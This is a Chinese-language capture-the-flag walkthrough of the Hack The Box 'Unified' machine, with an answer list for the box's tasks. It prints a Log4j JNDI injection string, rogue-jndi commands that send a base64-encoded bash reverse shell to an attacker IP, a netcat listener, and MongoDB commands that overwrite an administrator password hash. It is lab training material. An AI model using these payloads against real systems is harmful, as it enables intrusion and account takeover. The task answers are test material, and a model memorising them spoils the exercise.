HTB-Unified
HTB -Unified
Log4j CVE-202144228
1.端口扫描获得22,6789,8080,8443
2.访问8080端口后跳转8443端口,此端口web页面发现存在unified的cms ,通过搜索相关CMS Exploit 发现cms6.4.54版本存在Log4j漏洞
3.Log4j 语句构造,抓包重放验证Log4j漏洞是否存在payload
抓取的数据包内容修改remmber添加以下内容:
${jndi:ldap://10.10.14.26/whatever}
ldap 轻量级目录访问协议,默认端口389,如果存在漏洞发送payload消息,会发送数据报文到本机389端
4.TCPdump 监听389报文内容,数据内容说明目标主机通过49190端口来访问本机ldap端口,证明存在此漏洞
5.Log4j漏洞利用
准备工具:
1.openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y
2.Maven
sudo apt-get install maven -y
3.编译maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi:开启本机ldap服务,允许接收其他服务器数据,可执行代码
5.1 反弹shell
echo 'bash -c bash -i >&/dev/tcp/10.10.14.26/10086 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=
5.2 构建payload
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=}|
{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvMTAwODYgMD4mMQo=
java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.26"
5.3 burp发送payload 后返回请求获得shell
5.4 nc -lvnp 4444 监听反弹shell获得user权限
6.提权
查看mongdb端口情况ps aux | grep mongo,因为unifi 中间件默认的是mongdb数据库,通过远程代码执行修改数据库信息)
Mongdb 数据库是以json的格式作为存储内容,可以通过远程连接后就可以修改数据库内容
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
mongodb 默认数据库ace 通过unifi 条件语句查询ace
查询发现administrator的账户信息以及密码的加密信息
7.加密方式判别 Hashid 单引号转义后判断为 SHA-512加密方法
8.替换administrator hash 登录后台
生成sha512的密钥,替换mongdb中的administrator的密钥
通过mongo nosql语句进行替换
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$bddGuhm3UqXNoZ9p$We07yFxehCTxPqOKpKsGcu09nsS5fkauC1cD8dgQ3sjuKColLuPgia5ZjBTK0M17qe7yn6Fk7srqhDVZMfGZW1"}})'
9.登录后台,发现root开启了ssh 并且密码可视
10.Get flag
TASK
1.Which are the first four open ports?
22,6789,8080,8443
2.What is title of the software that is running running on port 8443?
unifi network
3.What is the version of the software that is running?
6.4.54
4.What is the CVE for the identified vulnerability?
CVE-2021-44228
5.What protocol does JNDI leverage in the injection?
ldap
6.What tool do we use to intercept the traffic, indicating the attack was successful?
tcpdump
7.What port do we need to inspect intercepted traffic for?
389
8.What port is the MongoDB service running on?
27117
9.What is the default database name for UniFi applications?
ace
10.What is the function we use to enumerate users within the database in MongoDB?
db.admin.find()
11.What is the function we use to update users within the database in MongoDB?
db.admin.update()
12.What is the password for the root user?
NotACrackablePassword4U2022
HTB-Unified相关推荐
- Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified
这个阶段的,终于不是之前的傻乎乎操作了,到这我才知道,那些问答不是先问答再渗透的.原来是渗透一步回答相应问题,这里涉及到了许多工具.脚本.提权.端口等知识点,收获丰富. Archetype TASK ...
- 2018/8/24阅读文献 A Unified Model for Multi-Objective Evolutionary Algorithms with Elitism
信息: 2000年 苏黎世联邦理工学院 题目: A Unified Model for Multi-Objective Evolutionary Algorithms with Elitism ...
- 普元eos开发手册_名词解释--统一应用(开发)平台Unified Application Platform
国内有些企业项目开发当中,可能会遇到UAP的概念,UAP指的是Unified Application Platform,即统一应用平台. UAP,简单的理解,就是公司层面,统一的技术平台,涉及整个公司 ...
- 目标检测--A Unified Multi-scale Deep Convolutional Neural Network for Fast Object Detection
A Unified Multi-scale Deep Convolutional Neural Network for Fast Object Detection ECCV2016 https://g ...
- 车辆检测--DAVE: A Unified Framework for Fast Vehicle Detection and Annotation
DAVE: A Unified Framework for Fast Vehicle Detection and Annotation ECCV2016 本文使用深度学习进行车辆检测和属性学习.提出的 ...
- FaceNet: A Unified Embedding for Face Recognition and Clustering
论文:FaceNet: A Unified Embedding for Face Recognition and Clustering 时间:2015.04.13 来源:CVPR 2015 来自谷歌的 ...
- 论文阅读:CNN-RNN: A Unified Framework for Multi-label Image Classification
CNN-RNN: A Unified Framework for Multi-label Image Classification Updated on 2018-08-0722:30:41 Pape ...
- Unified Networking Lab 安装使用IOL镜像
Unified Networking Lab 安装使用IOL镜像 Unified Networking Lab 很久以前,在一个星系远的地方,很远的工程师们为eBay寻找二手路由器来满足家庭实验的需求 ...
- YOLO系列阅读(一) YOLOv1原文阅读:You Only Look Once: Unified, Real-Time Object Detection
目录 0.Abstract 0.1原文翻译 第一段(说明本次研究和之前研究的区别) 第二段(速度快.虽然错误率高一点,但是背景被错误标记的概率更低) 0.2总结 1. Introduction 1.翻 ...
- Paper:《A Unified Approach to Interpreting Model Predictions—解释模型预测的统一方法》论文解读与翻译
Paper:<A Unified Approach to Interpreting Model Predictions-解释模型预测的统一方法>论文解读与翻译 导读:2017年11月25 ...
最新文章
- 40个比较重要的Android面试题
- 邵阳学院计算机科学与技术专业分最低,邵阳学院在湖南各专业录取最低分/最低位次...
- Ubuntu 16.04下的LAMP环境配置
- sqoop增量导出mysql_sqoop定时增量导入导出
- Java里String.split需要注意的用法
- PHP在哪里执行_php文件放在哪运行
- 互联网晚报 | 12月22日 星期三 | 乐视宣布涨薪;小米12系列官宣12月28日发布;好未来推出全新品牌美校...
- 消息中间件常见问题汇总
- 微信被曝大“Bug”?有用户账户资金被盗刷,这个功能要慎用
- 【转】单例模式(Singleton)
- linux get current thread count and system threads limit
- linux编程进程,Linux编程—进程
- [转载] 简单工厂模式和工厂方法模式在Python中的实现
- abaqus生成adams柔性体_Abaqus和STAR-CCM+流固耦合
- 利用爬虫技术清理微博“僵尸粉”
- 浅聊使用PHP实现微信公众号登录
- 对比苏州和杭州这两座城市,你会发现?
- 如何在html中引入代码,如何在HTML页面引入javaScript代码
- 数据仓库项目实例(马蜂窝数据仓库)
- 中银泰定期存款理财技巧